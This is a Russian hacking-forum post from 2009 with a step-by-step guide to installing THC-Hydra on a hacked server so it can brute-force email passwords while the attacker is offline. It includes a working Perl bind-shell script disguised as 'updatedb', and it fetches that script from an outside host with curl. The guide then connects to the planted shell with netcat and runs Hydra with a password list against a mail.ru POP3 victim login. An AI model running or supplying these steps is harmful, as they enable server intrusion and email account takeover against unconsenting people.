Устанавливаем THC-hydra на сервак для брута мыла

Тема в разделе "Статьи", создана пользователем 1xss, 22 дек 2009.

  1. 1xss
    1xss Новичок
    Симпатии:
    1
    Я расскажу о том как установить THC-hydra на взломанный сервак, для брута почтовых ящиков. Плюс этого метода в том что брут работает даже при выключенном компе т.к hydra висит на серваке...

    THC-Hydra - распараллеленый взломщик паролей к различным сервисам (ftp, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

    Нам потребуется:
    1.THC-hydra
    2.c99shell(или любой другой)
    3.NetCAT - утилитка для back-conect и др.
    4.exploit для бинда шелла на порт...

    ПРИСТУПИМ...

    Переходим в веб шелле в папку /tmp/ так как чаще всего она разрешенна для записи...
    Для удобсва в работе мы повесим шелл на 32762 порт и в последующим приконектимся netcat'ом...
    1.Открываем блокнот и копируем туда exploit и сщхраняем как bind_port.pl

    Код:
    #!/usr/bin/perl
    
    $port = 32762;
    $port = $ARGV[0] if $ARGV[0];
    exit if fork;
    $0 = "updatedb" . " " x100;
    $SIG{CHLD} = 'IGNORE';
    use Socket;
    socket(S, PF_INET, SOCK_STREAM, 0);
    setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
    bind(S, sockaddr_in($port, INADDR_ANY));
    listen(S, 50);
    while(1)
    {
    	accept(X, S);
    	unless(fork)
    	{
    		open STDIN, "<&X";
    		open STDOUT, ">&X";
    		open STDERR, ">&X";
    		close X;
    		exec("/bin/sh");
    	}
    	close X;
    }
    Изаливаем полученный файл на хост (narod.ru).

    Дальше узнаем качалку нашего веб шелла командой which CURL
    В моем случае она

    [​IMG]

    теперь забиндим наш шелл...
    командуем curl -O ./bind_port.pl http://phpaa.narod.ru/bind_port.pl;ls -la bind* - это эксплойт загруженный на narod.ru...
    Должно получится ввот так:

    [​IMG]

    Теперь открываем netcat и вбиваем туда ваш сайт и порт и жмем enter...

    Код:
    site.ru 32762
    [​IMG]

    Произошол коннект...
    Теперь заливаем гидру...

    пишим:

    Код:
    wget http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz
    [​IMG]

    Теперь разархивируем закаченный архив...

    Код:
    tar xvzf hydra-5.4-src.tar.gz
    [​IMG]

    Теперь переходим в папку с гидрой и устанавливаем...

    Код:
    cd hydra-5.4-src/
    И переходим к установки

    Код:
    ./configure
    [​IMG]

    далие следует команда

    Код:
    make
    [​IMG]

    Установка законченна запускаем командой

    Код:
    ./hydra
    [​IMG]

    Теперь закидываем на сервак большой словарь с паролями и сохраняем его. В моем случае он называется dic и log в нем будут сохранятся отчеты...
    Заливаем на гидру сомандой cp dic hydra-5.4-src/dic и cp log hydra-5.4-src/log
    И можно приступать к бруту...
    Командуем ./hydra -l 1xss -P dic -o log.txt -f pop.mail.ru pop3
    -l - login жертвы
    -P - Словарь пассов
    -o - лог отчетов
    -f - pop.mail.ru pop3 - думаю ясно))

    И можно ложится спать, утром смотрим лог)))

    Hydra for windows​


    Качаем ее с офф сайта http://freeworld.thc.org/thc-hydra/hydra-5.4-win.zip
    И сохраняем в какойнить папке на компе... и создаем два txt документа для словаря и лога... Затем запускаем файл hydra.exe с помощью командной строки и вбиваем конфиг для вашего мыла (которое вы хотите сбрутить)
    -l - login жертвы
    -P - Словарь пассов
    -o - лог отчетов
    -f - pop.mail.ru pop3
    И жмете enter...
    И потом смотрите лог...

    [​IMG]

    (с) t0xA http://green-hack.net
     
    22 дек 2009
    1 человеку нравится это.
  2. onthar
    onthar Продвинутый
    Симпатии:
    224
    Так она и скомпилилась без проблем. На современных системах скомпилять ее весьма проблематично.
     
    22 дек 2009
Загрузка...